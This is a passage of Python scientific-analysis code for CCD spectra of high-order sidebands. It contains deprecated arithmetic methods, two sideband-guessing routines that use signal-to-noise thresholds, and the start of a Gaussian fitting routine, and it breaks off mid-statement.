self.fname = "Live Data"
else:
raise Exception(
"I don't know what this file type is {}, type: {}".format(
hsg_thing, type(hsg_thing)))
self.proc_data = np.array(self.ccd_data)
# proc_data is now a 1600 long array with [frequency (eV),
# signal (counts / FEL pulse), S.E. of signal mean]
# self.parameters["nir_freq"] = 1239.84
# / float(self.parameters["nir_lambda"])
self.parameters["nir_freq"] = 1239.84 / float(self.parameters.get(
"nir_lambda", -1))
# self.parameters["thz_freq"] = 0.000123984 *
# float(self.parameters["fel_lambda"])
self.parameters["thz_freq"] = 0.000123984 * float(self.parameters.get(
"fel_lambda", -1))
# self.parameters["nir_power"] = float(self.parameters["nir_power"])
self.parameters["nir_power"] = float(self.parameters.get(
"nir_power", -1))
try: # This is the new way of doing things. Also, now it's power
self.parameters["thz_energy"] = float(
self.parameters["pulseEnergies"]["mean"])
self.parameters["thz_energy_std"] = float(
self.parameters["pulseEnergies"]["std"])
except Exception: # This is the old way TODO: DEPRECATE THIS
self.parameters["thz_energy"] = float(self.parameters.get(
"fel_power", -1))
# things used in fitting/guessing
self.sb_list = np.array([])
self.sb_index = np.array([])
self.sb_dict = {}
self.sb_results = np.array([])
self.full_dict = {}
def __add__(self, other):
"""
Add together the image data from self.proc_data, or add a constant to
that np.array. It will then combine the addenda and subtrahenda lists,
as well as add the fel_pulses together. If type(other) is a CCD
object, then it will add the errors as well.
Input:
self = CCD-like object
other = int, float or CCD object
Internal:
ret.proc_data = the self.proc_data + other(.proc_data)
ret.addenda = combination of two input addenda lists
This raises a FutureWarning because these were designed early on and
haven't been used much.
:param other: The thing to be added, it's either a int/float or a
HighSidebandCCD object
:type other: int/float or HighSidebandCCD
:return: Sum of self and other
:rtype: HighSidebandCCD
"""
raise FutureWarning
ret = copy.deepcopy(self)
# Add a constant offset to the data
if type(other) in (int, float):
ret.proc_data[:, 1] = self.proc_data[:, 1] + other
ret.addenda[0] = ret.addenda[0] + other
# or add the data of two hsg_spectra together
else:
if np.isclose(ret.parameters['center_lambda'],
other.parameters['center_lambda']):
ret.proc_data[:, 1] = (
self.proc_data[:, 1] + other.proc_data[:, 1])
ret.proc_data[:, 2] = np.sqrt(
self.proc_data[:, 1] ** 2 + other.proc_data[:, 1] ** 2)
ret.addenda[0] = ret.addenda[0] + other.addenda[0]
ret.addenda.extend(other.addenda[1:])
ret.subtrahenda.extend(other.subtrahenda)
ret.parameters['fel_pulses'] += other.parameters['fel_pulses']
else:
raise Exception(
'Source: Spectrum.__add__:\n' +
'These are not from the same grating settings')
return ret
def __sub__(self, other):
"""
This subtracts constants or other data sets between self.proc_data. I
think it even keeps track of what data sets are in the file and how
they got there.
See how __add__ works for more information.
This raises a FutureWarning because these were designed early on and
haven't been used much.
:param other: The thing to be subtracted, it's either a int/float or a
HighSidebandCCD object
:type other: int/float or HighSidebandCCD
:return: Sum of self and other
:rtype: HighSidebandCCD
"""
raise FutureWarning
ret = copy.deepcopy(self)
# Subtract a constant offset to the data
if type(other) in (int, float):
# Need to choose a name
ret.proc_data[:, 1] = self.proc_data[:, 1] - other
ret.addenda[0] = ret.addenda[0] - other
# Subtract the data of two hsg_spectra from each other
else:
if np.isclose(ret.proc_data[0, 0], other.proc_data[0, 0]):
ret.proc_data[:, 1] = (
self.proc_data[:, 1] - other.proc_data[:, 1])
ret.proc_data[:, 2] = np.sqrt(
self.proc_data[:, 1] ** 2 + other.proc_data[:, 1] ** 2)
ret.subtrahenda.extend(other.addenda[1:])
ret.addenda.extend(other.subtrahenda)
else:
raise Exception(
'Source: Spectrum.__sub__:\n' +
'These are not from the same grating settings')
return ret
def __repr__(self):
"""
This returns a string of filename, series, spectrometer step,
and the wavelengths of FEL and NIR lasers.
"""
base = """
fname: {},
Series: {series},
spec_step: {spec_step},
fel_lambda: {fel_lambda},
nir_lambda: {nir_lambda}""".format(
os.path.basename(self.fname), **self.parameters)
return base
__str__ = __repr__
def calc_approx_sb_order(self, test_nir_freq):
"""
This simple method will simply return a float approximating the order
of the frequency input. We need this because the CCD wavelength
calibration is not even close to perfect. And it shifts by half a nm
sometimes.
:param test_nir_freq: the frequency guess of the nth sideband
:type test_nir_freq: float
:return: The approximate order of the sideband in question
:rtype: float
"""
nir_freq = self.parameters['nir_freq']
thz_freq = self.parameters['thz_freq']
# If thz = 0, prevent error
if not thz_freq:
thz_freq = 1
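        # Worked example (illustrative numbers, comment only): with
        # nir_freq = 1.5498 eV and thz_freq = 0.0124 eV, a sideband seen at
        # 1.6118 eV gives (1.6118 - 1.5498) / 0.0124 = 5.0, i.e. roughly
        # the 5th-order sideband.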
approx_order = (test_nir_freq - nir_freq) / thz_freq
return approx_order
# TODO: break the following definition into multiple parts, possibly files
def guess_sidebands(self, cutoff=4.5, verbose=False, plot=False, **kwargs):
"""
Update 05/24/18:
Hunter had two different loops for negative order sidebands,
then positive order sidebands. They're done pretty much identically,
so I've finally merged them into one.
Finds the locations of all the sidebands in the proc_data array to be
able to seed the fitting method. This works by finding the maximum
data value in the array and guessing what sideband it is. It creates
an array that includes this information. It will then step down,
initially by one THz frequency, then by twos after it hasn't found any
odd ones. It then goes up from the max and finds everything above in
much the same way.
There is currently no rhyme or reason to a cutoff of 8. I don't know
what it should be changed to, though.
Input:
cutoff = signal-to-noise threshold to count a sideband candidate.
kwargs:
window_size: how big of a window (in pixels) to use for checking for
sidebands. Specified in half-width
default: 15
Internal:
self.sb_list = List of all of the orders the method found
self.sb_index = index of all of the peaks of the sidebands
self.sb_guess = three-part list including the frequency, amplitude and
error guesses for each sideband
"""
# TODO: this isn't commented appropriately.
# Will it be made more readable first?
if "cutoff" in self.parameters:
cutoff = self.parameters["cutoff"]
else:
self.parameters['cutoff for guess_sidebands'] = cutoff
if verbose:
print("=" * 15)
print()
print("Guessing CCD Sideband parameters")
print(os.path.basename(self.fname))
print("\tCutoff = {}".format(cutoff))
print()
print("=" * 15)
x_axis = np.array(self.proc_data[:, 0])
y_axis = np.array(self.proc_data[:, 1])
try:
error = np.array(self.proc_data[:, 2])
except IndexError:
# Happens on old data where spectra weren't calculated in the live
# software.
error = np.ones_like(x_axis)
min_sb = int(self.calc_approx_sb_order(x_axis[0])) + 1
try:
max_sb = int(self.calc_approx_sb_order(x_axis[-1]))
except ValueError:
print(x_axis)
nir_freq = self.parameters["nir_freq"]
thz_freq = self.parameters["thz_freq"]
if verbose:
print("min_sb: {} | max_sb: {}".format(min_sb, max_sb))
# Find max strength sideband and it's order
global_max = np.argmax(y_axis)
order_init = int(round(self.calc_approx_sb_order(x_axis[global_max])))
# if verbose:
# print "The global max is at index", global_max
if global_max < 15:
check_y = y_axis[:global_max + 15]
check_y = np.concatenate((np.zeros(15 - global_max), check_y))
elif global_max > 1585:
check_y = y_axis[global_max - 15:]
check_y = np.concatenate((check_y, np.zeros(global_max - 1585)))
else:
check_y = y_axis[global_max - 15:global_max + 15]
check_max_index = np.argmax(check_y)
check_max_area = np.sum(
check_y[check_max_index - 2:check_max_index + 3])
check_ave = np.mean(check_y[[0, 1, 2, 3, 4, -1, -2, -3, -4, -5]])
check_stdev = np.std(check_y[[0, 1, 2, 3, 4, -1, -2, -3, -4, -5]])
check_ratio = (check_max_area - 3 * check_ave) / check_stdev
if verbose:
print(("{:^16}" * 5).format(
"global_max idx", "check_max_area", "check_ave", "check_stdev",
"check_ratio"))
print(("{:^16.5g}" * 5).format(
global_max, check_max_area, check_ave,
check_stdev, check_ratio))
if check_ratio > cutoff:
self.sb_list = [order_init]
self.sb_index = [global_max]
sb_freq_guess = [x_axis[global_max]]
sb_amp_guess = [y_axis[global_max]]
sb_error_est = [
np.sqrt(sum(
[i ** 2 for i in error[global_max - 2:global_max + 3]]))
/ (check_max_area - 5 * check_ave)]
else:
print("There are no sidebands in", self.fname)
raise RuntimeError
if verbose:
print("\t Looking for sidebands with f < {:.6f}".format(
sb_freq_guess[0]))
last_sb = sb_freq_guess[0]
index_guess = global_max
# keep track of how many consecutive sidebands we've skipped. Sometimes
# one's noisy or something, so we keep looking after skipping one
consecutive_null_sb = 0
consecutive_null_odd = 0
no_more_odds = False
break_condition = False
for order in range(order_init - 1, min_sb - 1, -1):
# Check to make sure we're not looking at an odd when
# we've decided to skip them.
if no_more_odds is True and order % 2 == 1:
last_sb = last_sb - thz_freq
if verbose:
print("I skipped", order)
continue
# Window size to look for next sideband. Needs to be order
# dependent because higher orders get wider, so we need to look at
# more. Values are arbitrary.
window_size = 0.45 + 0.0004 * order # used to be last_sb?
lo_freq_bound = last_sb - thz_freq * (
1 + window_size) # Not sure what to do about these
hi_freq_bound = last_sb - thz_freq * (1 - window_size)
if verbose:
print("\nSideband", order)
print("\t{:.4f} < f_{} < {:.4f}".format(lo_freq_bound, order,
hi_freq_bound))
            # Get the indices at which energies lie within the bounds for this SB
sliced_indices = \
np.where((x_axis > lo_freq_bound)
& (x_axis < hi_freq_bound))[0]
start_index, end_index = sliced_indices.min(), sliced_indices.max()
# Get a slice of the y_data which is only in the region of interest
check_y = y_axis[sliced_indices]
check_max_index = np.argmax(
check_y) # This assumes that two floats won't be identical
# Calculate the "area" of the sideband by looking at the peak value
# within the range, and the pixel above/below it
check_max_area = np.sum(
check_y[check_max_index - 1:check_max_index + 2])
if verbose and plot:
plt.figure("CCD data")
plt.plot(
[lo_freq_bound] * 2, [0, check_y[check_max_index]], 'b')
plt.plot(
[hi_freq_bound] * 2, [0, check_y[check_max_index]], 'b')
plt.plot(
[lo_freq_bound, hi_freq_bound], [check_y[check_max_index]]
* 2, 'b', label="{} Box".format(order))
plt.text(
(lo_freq_bound + hi_freq_bound) / 2,
check_y[check_max_index], order)
# get slice that doesn't have the peak in it to compare statistics
check_region = np.append(check_y[:check_max_index - 1],
check_y[check_max_index + 2:])
check_ave = check_region.mean()
check_stdev = check_region.std()
# Calculate an effective SNR, where check_ave is roughly the
# background level
check_ratio = (check_max_area - 3 * check_ave) / check_stdev
# This raises the barrier for odd sideband detection
if order % 2 == 1:
check_ratio = check_ratio / 1.5
if verbose:
print("\t" + ("{:^14}" * 4).format(
"check_max_area", "check_ave",
"check_stdev", "check_ratio"))
print("\t" + ("{:^14.5g}" * 4).format(
check_max_area, check_ave, check_stdev, check_ratio))
if check_ratio > cutoff:
found_index = check_max_index + start_index
self.sb_index.append(found_index)
last_sb = x_axis[found_index]
if verbose:
print("I just found", last_sb)
sb_freq_guess.append(x_axis[found_index])
sb_amp_guess.append(check_max_area - 3 * check_ave)
error_est = np.sqrt(
sum(
[i ** 2 for i in error[
found_index - 1:found_index + 2]]
)) / (check_max_area - 3 * check_ave)
if verbose:
print("My error estimate is:", error_est)
sb_error_est.append(error_est)
self.sb_list.append(order)
consecutive_null_sb = 0
if order % 2 == 1:
consecutive_null_odd = 0
else:
# print "I could not find sideband with order", order
last_sb = last_sb - thz_freq
consecutive_null_sb += 1
if order % 2 == 1:
consecutive_null_odd += 1
if consecutive_null_odd == 1 and no_more_odds is False:
# print "I'm done looking for odd sidebands"
no_more_odds = True
if consecutive_null_sb == 2:
# print "I can't find any more sidebands"
break
# Look for higher sidebands
if verbose:
print("\nLooking for higher energy sidebands")
last_sb = sb_freq_guess[0]
index_guess = global_max
consecutive_null_sb = 0
consecutive_null_odd = 0
no_more_odds = False
break_condition = False
for order in range(order_init + 1, max_sb + 1):
if no_more_odds is True and order % 2 == 1:
last_sb = last_sb + thz_freq
continue
window_size = 0.45 + 0.001 * order # used to be 0.28 and 0.0004
lo_freq_bound = last_sb + thz_freq * (
1 - window_size) # Not sure what to do about these
hi_freq_bound = last_sb + thz_freq * (1 + window_size)
start_index = False
end_index = False
if verbose:
print("\nSideband", order)
# print "The low frequency bound is", lo_freq_bound
# print "The high frequency bound is", hi_freq_bound
print("\t{:.4f} < f_{} < {:.4f}".format(lo_freq_bound, order,
hi_freq_bound))
for i in range(index_guess, 1600):
if start_index is False and i == 1599:
# print "I'm all out of space, captain!"
break_condition = True
break
elif start_index is False and x_axis[i] > lo_freq_bound:
# print "start_index is", i
start_index = i
elif i == 1599:
end_index = 1599
# print "hit end of data, end_index is 1599"
elif end_index is False and x_axis[i] > hi_freq_bound:
end_index = i
# print "end_index is", i
index_guess = i
break
if break_condition:
break
check_y = y_axis[start_index:end_index]
# This assumes that two floats won't be identical
check_max_index = np.argmax(check_y)
# To be able to break down check_y into eighths
octant = len(check_y) // 8
if octant < 1:
octant = 1
check_max_area = np.sum(
check_y[check_max_index - octant - 1:
check_max_index + octant + 1])
if verbose and plot:
plt.figure("CCD data")
plt.plot(
[lo_freq_bound] * 2, [0, check_y[check_max_index]], 'b')
plt.plot(
[hi_freq_bound] * 2, [0, check_y[check_max_index]], 'b')
plt.plot(
[lo_freq_bound, hi_freq_bound],
[check_y[check_max_index]] * 2, 'b', label=order)
plt.text(
(lo_freq_bound + hi_freq_bound) / 2,
check_y[check_max_index], order)
no_peak = (2 * len(
check_y)) // 6 # The denominator is in flux, used to be 5
# if verbose: print "\tcheck_y length", len(check_y)
check_ave = np.mean(np.take(check_y, np.concatenate(
(np.arange(no_peak), np.arange(-no_peak, 0)))))
check_stdev = np.std(np.take(check_y, np.concatenate(
(np.arange(no_peak), np.arange(-no_peak, 0)))))
check_ratio = (
check_max_area - (2 * octant + 1) * check_ave) / check_stdev
if verbose:
print("\tIndices: {}->{} (d={})".format(start_index, end_index,
len(check_y)))
# print "check_y is", check_y
# print "\ncheck_max_area is", check_max_area
# print "check_ave is", check_ave
# print "check_stdev is", check_stdev
# print "check_ratio is", check_ratio
print("\t" + ("{:^14}" * 4).format(
"check_max_area", "check_ave",
"check_stdev", "check_ratio"))
print("\t" + ("{:^14.6g}" * 4).format(
check_max_area, check_ave, check_stdev, check_ratio))
# This raises the barrier for odd sideband detection
if order % 2 == 1:
check_ratio = check_ratio / 2
if check_ratio > cutoff:
found_index = check_max_index + start_index
self.sb_index.append(found_index)
last_sb = x_axis[found_index]
# print "\tI found", order, "at index", found_index, "at freq", last_sb
if verbose:
print(
"\tI'm counting this SB at index {} (f={:.4f})".format(
found_index, last_sb),
end=' ')
sb_freq_guess.append(
x_axis[found_index])
sb_amp_guess.append(
check_max_area - (2 * octant + 1) * check_ave)
# This error is a relative error.
error_est = (
np.sqrt(sum([i ** 2 for i in error[
found_index - octant:found_index + octant]]))
/ (check_max_area - (2 * octant + 1) * check_ave))
if verbose:
print(". Err = {:.3g}".format(error_est))
# print "\tMy error estimate is:", error_est
# print "My relative error is:", error_est / sb_amp_guess
sb_error_est.append(error_est)
self.sb_list.append(order)
consecutive_null_sb = 0
if order % 2 == 1:
consecutive_null_odd = 0
else:
# print "I could not find sideband with order", order
last_sb = last_sb + thz_freq
consecutive_null_sb += 1
if order % 2 == 1:
consecutive_null_odd += 1
if verbose:
print("\t\tI did not count this sideband")
if consecutive_null_odd == 1 and no_more_odds is False:
# print "I'm done looking for odd sidebands"
no_more_odds = True
if consecutive_null_sb == 2:
# print "I can't find any more sidebands"
break
if verbose:
print("I found these sidebands:", self.sb_list)
print('-' * 15)
print()
print()
# self.sb_guess = [frequency guess, amplitude guess,
# relative error of amplitude] for each sideband.
self.sb_guess = np.array([np.asarray(sb_freq_guess),
np.asarray(sb_amp_guess),
np.asarray(sb_error_est)]).T
    # TODO: alter guess_sidebands and guess_sidebandsOld to share functions
def guess_sidebandsOld(
self, cutoff=4.5, verbose=False, plot=False, **kwargs):
"""
05/24/18
        Old code from Hunter's days (or nearly; I've already started cleaning
        some stuff up). Keeping it around in case I break too much stuff.
Finds the locations of all the sidebands in the proc_data array to be
able to seed the fitting method. This works by finding the maximum
data value in the array and guessing what sideband it is. It creates
an array that includes this information. It will then step down,
initially by one THz frequency, then by twos after it hasn't found any
odd ones. It then goes up from the max and finds everything above in
much the same way.
There is currently no rhyme or reason to a cutoff of 8. I don't know
what it should be changed to, though.
Input:
cutoff = signal-to-noise threshold to count a sideband candidate.
kwargs:
window_size: how big of a window (in pixels) to use for checking for
sidebands. Specified in half-width
default: 15
Internal:
self.sb_list = List of all of the orders the method found
self.sb_index = index of all of the peaks of the sidebands
self.sb_guess = three-part list including the frequency, amplitude and
error guesses for each sideband
"""
# TODO: this isn't commented appropriately.
# Will it be made more readable first?
if "cutoff" in self.parameters:
cutoff = self.parameters["cutoff"]
else:
self.parameters['cutoff for guess_sidebands'] = cutoff
if verbose:
print("=" * 15)
print()
print("Guessing CCD Sideband parameters")
print(os.path.basename(self.fname))
print("\tCutoff = {}".format(cutoff))
print()
print("=" * 15)
x_axis = np.array(self.proc_data[:, 0])
y_axis = np.array(self.proc_data[:, 1])
error = np.array(self.proc_data[:, 2])
min_sb = int(self.calc_approx_sb_order(x_axis[0])) + 1
try:
max_sb = int(self.calc_approx_sb_order(x_axis[-1]))
except ValueError:
print(x_axis)
nir_freq = self.parameters["nir_freq"]
thz_freq = self.parameters["thz_freq"]
if verbose:
print("min_sb: {} | max_sb: {}".format(min_sb, max_sb))
        # Find max strength sideband and its order
global_max = np.argmax(y_axis)
order_init = int(round(self.calc_approx_sb_order(x_axis[global_max])))
# if verbose:
# print "The global max is at index", global_max
if global_max < 15:
check_y = y_axis[:global_max + 15]
check_y = np.concatenate((np.zeros(15 - global_max), check_y))
elif global_max > 1585:
check_y = y_axis[global_max - 15:]
check_y = np.concatenate((check_y, np.zeros(global_max - 1585)))
else:
check_y = y_axis[global_max - 15:global_max + 15]
check_max_index = np.argmax(check_y)
check_max_area = np.sum(
check_y[check_max_index - 2:check_max_index + 3])
check_ave = np.mean(check_y[[0, 1, 2, 3, 4, -1, -2, -3, -4, -5]])
check_stdev = np.std(check_y[[0, 1, 2, 3, 4, -1, -2, -3, -4, -5]])
check_ratio = (check_max_area - 3 * check_ave) / check_stdev
if verbose:
print(("{:^16}" * 5).format(
"global_max idx", "check_max_area", "check_ave", "check_stdev",
"check_ratio"))
print(("{:^16.5g}" * 5).format(
global_max, check_max_area, check_ave,
check_stdev, check_ratio))
if check_ratio > cutoff:
self.sb_list = [order_init]
self.sb_index = [global_max]
sb_freq_guess = [x_axis[global_max]]
sb_amp_guess = [y_axis[global_max]]
sb_error_est = [
np.sqrt(sum([i ** 2 for i in error[
global_max - 2:global_max + 3]]))
/ (check_max_area - 5 * check_ave)]
else:
print("There are no sidebands in", self.fname)
raise RuntimeError
if verbose:
print("\t Looking for sidebands with f < {:.6f}".format(
sb_freq_guess[0]))
last_sb = sb_freq_guess[0]
index_guess = global_max
# keep track of how many consecutive sidebands we've skipped. Sometimes
# one's noisy or something, so we'd keep looking after skipping one
consecutive_null_sb = 0
consecutive_null_odd = 0
no_more_odds = False
break_condition = False
for order in range(order_init - 1, min_sb - 1, -1):
# Check to make sure we're not looking at an odd when
# we've decided to skip them.
if no_more_odds is True and order % 2 == 1:
last_sb = last_sb - thz_freq
if verbose:
print("I skipped", order)
continue
# Window size to look for next sideband. Needs to be order
# dependent because higher orders get wider, so we need to look at
# more. Values are arbitrary.
window_size = 0.45 + 0.0004 * order # used to be last_sb?
lo_freq_bound = last_sb - thz_freq * (
1 + window_size) # Not sure what to do about these
hi_freq_bound = last_sb - thz_freq * (1 - window_size)
if verbose:
print("\nSideband", order)
print("\t{:.4f} < f_{} < {:.4f}".format(lo_freq_bound, order,
hi_freq_bound))
# Get the indices where the energies lie within the bounds for this SB
sliced_indices = \
np.where((x_axis > lo_freq_bound)
& (x_axis < hi_freq_bound))[0]
start_index, end_index = sliced_indices.min(), sliced_indices.max()
# Get a slice of the y_data which is only in the region of interest
check_y = y_axis[sliced_indices]
check_max_index = np.argmax(
check_y) # This assumes that two floats won't be identical
# Calculate the "area" of the sideband by looking at the peak value
# within the range, and the pixel above/below it
check_max_area = np.sum(
check_y[check_max_index - 1:check_max_index + 2])
if verbose and plot:
plt.figure("CCD data")
plt.plot(
[lo_freq_bound] * 2, [0, check_y[check_max_index]], 'b')
plt.plot(
[hi_freq_bound] * 2, [0, check_y[check_max_index]], 'b')
plt.plot(
[lo_freq_bound, hi_freq_bound], [check_y[check_max_index]]
* 2, 'b', label="{} Box".format(order))
plt.text(
(lo_freq_bound + hi_freq_bound) / 2,
check_y[check_max_index], order)
# get slice that doesn't have the peak in it to compare statistics
check_region = np.append(check_y[:check_max_index - 1],
check_y[check_max_index + 2:])
check_ave = check_region.mean()
check_stdev = check_region.std()
# Calculate an effective SNR, where check_ave is roughly the
# background level
check_ratio = (check_max_area - 3 * check_ave) / check_stdev
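            # A worked example with hypothetical numbers: if the 3-pixel peak
            # sums to check_max_area = 1200 counts over a background of
            # check_ave = 100 counts/pixel with check_stdev = 30, then
            # check_ratio = (1200 - 3 * 100) / 30 = 30, comfortably above the
            # default cutoff of 4.5.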
# This raises the barrier for odd sideband detection
if order % 2 == 1:
check_ratio = check_ratio / 1.5
if verbose:
print("\t" + ("{:^14}" * 4).format(
"check_max_area", "check_ave",
"check_stdev", "check_ratio"))
print("\t" + ("{:^14.5g}" * 4).format(
check_max_area, check_ave, check_stdev, check_ratio))
if check_ratio > cutoff:
found_index = check_max_index + start_index
self.sb_index.append(found_index)
last_sb = x_axis[found_index]
if verbose:
print("I just found", last_sb)
sb_freq_guess.append(x_axis[found_index])
sb_amp_guess.append(check_max_area - 3 * check_ave)
error_est = np.sqrt(
sum(
[i ** 2 for i in error[
found_index - 1:found_index + 2]]
)) / (check_max_area - 3 * check_ave)
if verbose:
print("My error estimate is:", error_est)
sb_error_est.append(error_est)
self.sb_list.append(order)
consecutive_null_sb = 0
if order % 2 == 1:
consecutive_null_odd = 0
else:
# print "I could not find sideband with order", order
last_sb = last_sb - thz_freq
consecutive_null_sb += 1
if order % 2 == 1:
consecutive_null_odd += 1
if consecutive_null_odd == 1 and no_more_odds is False:
# print "I'm done looking for odd sidebands"
no_more_odds = True
if consecutive_null_sb == 2:
# print "I can't find any more sidebands"
break
# Look for higher sidebands
if verbose:
print("\nLooking for higher energy sidebands")
last_sb = sb_freq_guess[0]
index_guess = global_max
consecutive_null_sb = 0
consecutive_null_odd = 0
no_more_odds = False
break_condition = False
for order in range(order_init + 1, max_sb + 1):
if no_more_odds is True and order % 2 == 1:
last_sb = last_sb + thz_freq
continue
window_size = 0.45 + 0.001 * order # used to be 0.28 and 0.0004
lo_freq_bound = last_sb + thz_freq * (
1 - window_size) # Not sure what to do about these
hi_freq_bound = last_sb + thz_freq * (1 + window_size)
start_index = False
end_index = False
if verbose:
print("\nSideband", order)
# print "The low frequency bound is", lo_freq_bound
# print "The high frequency bound is", hi_freq_bound
print("\t{:.4f} < f_{} < {:.4f}".format(lo_freq_bound, order,
hi_freq_bound))
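            # Scan pixel by pixel for the window edges; 1600 is the CCD width
            # in pixels, which is why 1599 appears as the hard-coded last
            # index in the checks below.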
for i in range(index_guess, 1600):
if start_index is False and i == 1599:
# print "I'm all out of space, captain!"
break_condition = True
break
elif start_index is False and x_axis[i] > lo_freq_bound:
# print "start_index is", i
start_index = i
elif i == 1599:
end_index = 1599
# print "hit end of data, end_index is 1599"
elif end_index is False and x_axis[i] > hi_freq_bound:
end_index = i
# print "end_index is", i
index_guess = i
break
if break_condition:
break
check_y = y_axis[start_index:end_index]
check_max_index = np.argmax(
check_y) # This assumes that two floats won't be identical
# To be able to break down check_y into eighths
octant = len(check_y) // 8
if octant < 1:
octant = 1
check_max_area = np.sum(
check_y[check_max_index - octant - 1:
check_max_index + octant + 1])
if verbose and plot:
plt.figure("CCD data")
plt.plot(
[lo_freq_bound] * 2, [0, check_y[check_max_index]], 'b')
plt.plot(
[hi_freq_bound] * 2, [0, check_y[check_max_index]], 'b')
plt.plot(
[lo_freq_bound, hi_freq_bound],
[check_y[check_max_index]] * 2, 'b', label=order)
plt.text(
(lo_freq_bound + hi_freq_bound) / 2,
check_y[check_max_index], order)
no_peak = (2 * len(
check_y)) // 6 # The denominator is in flux, used to be 5
# if verbose: print "\tcheck_y length", len(check_y)
check_ave = np.mean(np.take(check_y, np.concatenate(
(np.arange(no_peak), np.arange(-no_peak, 0)))))
check_stdev = np.std(np.take(check_y, np.concatenate(
(np.arange(no_peak), np.arange(-no_peak, 0)))))
check_ratio = ((check_max_area - (2 * octant + 1) * check_ave)
/ check_stdev)
if verbose:
print("\tIndices: {}->{} (d={})".format(start_index, end_index,
len(check_y)))
# print "check_y is", check_y
# print "\ncheck_max_area is", check_max_area
# print "check_ave is", check_ave
# print "check_stdev is", check_stdev
# print "check_ratio is", check_ratio
print("\t" + ("{:^14}" * 4).format(
"check_max_area", "check_ave",
"check_stdev", "check_ratio"))
print("\t" + ("{:^14.6g}" * 4).format(
check_max_area, check_ave, check_stdev, check_ratio))
# This raises the barrier for odd sideband detection
if order % 2 == 1:
check_ratio = check_ratio / 2
if check_ratio > cutoff:
found_index = check_max_index + start_index
self.sb_index.append(found_index)
last_sb = x_axis[found_index]
# print "\tI found", order, "at index", found_index, "at freq", last_sb
if verbose:
print(
"\tI'm counting this SB at index {} (f={:.4f})".format(
found_index, last_sb), end=' ')
sb_freq_guess.append(x_axis[found_index])
sb_amp_guess.append(
check_max_area - (2 * octant + 1) * check_ave)
error_est = (
np.sqrt(sum([i ** 2 for i in error[
found_index - octant:found_index + octant]]))
/ (check_max_area - (2 * octant + 1) * check_ave))
# This error is a relative error.
if verbose:
print(". Err = {:.3g}".format(error_est))
# print "\tMy error estimate is:", error_est
# print "My relative error is:", error_est / sb_amp_guess
sb_error_est.append(error_est)
self.sb_list.append(order)
consecutive_null_sb = 0
if order % 2 == 1:
consecutive_null_odd = 0
else:
# print "I could not find sideband with order", order
last_sb = last_sb + thz_freq
consecutive_null_sb += 1
if order % 2 == 1:
consecutive_null_odd += 1
if verbose:
print("\t\tI did not count this sideband")
if consecutive_null_odd == 1 and no_more_odds is False:
# print "I'm done looking for odd sidebands"
no_more_odds = True
if consecutive_null_sb == 2:
# print "I can't find any more sidebands"
break
if verbose:
print("I found these sidebands:", self.sb_list)
print('-' * 15)
print()
print()
self.sb_guess = np.array(
[np.asarray(sb_freq_guess), np.asarray(sb_amp_guess),
np.asarray(sb_error_est)]).T
# self.sb_guess = [frequency guess, amplitude guess,
# relative error of amplitude] for each sideband.
def fit_sidebands(self, plot=False, verbose=False):
"""
This takes self.sb_guess and fits to each maxima to get the details of
each sideband. It's really ugly, but it works. The error of the
sideband area is approximated from the data, not the curve fit. All
else is from the curve fit. Which is definitely underestimating the
error, but we don't care too much about those errors (at this point).
self.sb_guess = [frequency guess, amplitude guess, relative error of
amplitude] for each sideband.
Temporary stuff:
sb_fits = holder of the fitting results until all spectra have been fit
window = an integer that determines the "radius" of the fit window,
proportional to thz_freq.
Attributes created:
self.sb_results = the money maker. Column order:
[sb number, Freq (eV), Freq error (eV), Gauss area (arb.),
Area error, Gauss linewidth (eV), Linewidth error (eV)]
[ 0 , 1 , 2, , 3 ,
4 , 5 , 6 ]
self.full_dict = a dictionary similar to sb_results, but now the keys
are the sideband orders. Column ordering is otherwise the same.
:param plot: Do you want to see the fits plotted with the data?
:type plot: bool
:param verbose: Do you want to see the details
AND the initial guess fits?
:type verbose: bool
:return: None
"""
# print "Trying to fit these"
sb_fits = []
if verbose:
print("=" * 15)
print()
print("Fitting CCD Sidebands")
print(os.path.basename(self.fname))
print()
print("=" * 15)
# pretty sure you want this up here so things don't break
# when no sidebands found
self.full_dict = {}
thz_freq = self.parameters["thz_freq"]
# Adjust the fit window based on the sideband spacing The 15's are based on
# empirical knowledge that for 540 GHz (2.23 meV), the best window size is 30
# and that it seems like the window size should grow slowly?
window = 15 + int(15 * thz_freq / 0.0022)
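        # Worked example: for the empirical 540 GHz case, thz_freq = 0.00223 eV
        # gives window = 15 + int(15 * 0.00223 / 0.0022) = 15 + 15 = 30,
        # reproducing the known-good window size quoted above.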
        # Have to do this because guess_sidebands doesn't output data in the
        # most optimized way
for elem, peakIdx in enumerate(self.sb_index):
if peakIdx < window:
data_temp = self.proc_data[:peakIdx + window, :]
elif (1600 - peakIdx) < window:
data_temp = self.proc_data[peakIdx - window:, :]
else:
data_temp = self.proc_data[
peakIdx - window:peakIdx + window, :]
# so the width guess gets wider as order goes up
width_guess = 0.0001 + 0.000001 * self.sb_list[elem]
p0 = np.array([self.sb_guess[elem, 0],
self.sb_guess[elem, 1] * width_guess,
width_guess,
0.1])
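            # As far as can be inferred from how the fit is handled below
            # (coeff[1] treated as area, coeff[2] as linewidth), the gauss
            # parameters are [center (eV), integrated area, linewidth (eV),
            # constant offset]; the area guess is the peak-height guess times
            # the width guess since sb_guess stores heights, not areas.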
# print "Let's fit this shit!"
if verbose:
# TODO: check that . operator can carry to next line
print(
"Fitting SB {}. Peak index: {}, {}th peak in spectra".
format(self.sb_list[elem], peakIdx, elem))
# print "\nnumber:", elem, num
# print "data_temp:", data_temp
# print "p0:", p0
print(' '*20 + "p0 = " + np.array_str(p0, precision=4))
# This is to disable plotting the guess function
# plot_guess = True
if verbose and plot:
plt.figure('CCD data')
linewidth = 3
x_vals = np.linspace(
data_temp[0, 0], data_temp[-1, 0], num=500)
if elem != 0:
try:
plt.plot(x_vals, gauss(x_vals, *p0),
# I don't really know. Mostly
plt.gca().get_lines()[-1].get_color() + '--',
# just looked around at what functions
# matplotlib has...
linewidth=linewidth)
# to prevent weird mac issues with the matplotlib things?
except Exception:
plt.plot(
x_vals, gauss(x_vals, *p0), '--',
linewidth=linewidth)
else:
plt.plot(
x_vals, gauss(x_vals, *p0), '--',
linewidth=linewidth)
try:
# 11/1/16
# had to bump maxfev up to 2k since a sideband wasn't being fit
# Fix for sb 106
# 05-23 Loren 10nm\hsg_640_Perp352seq_spectrum.txt
            # TODO: find new name for gauss parameter and correct code
coeff, var_list = curve_fit(
gauss, data_temp[:, 0], data_temp[:, 1],
p0=p0, maxfev=2000)
except Exception as e:
if verbose:
print("\tThe fit failed:")
print("\t\t", e)
print("\tFitting region: {}->{}".format(
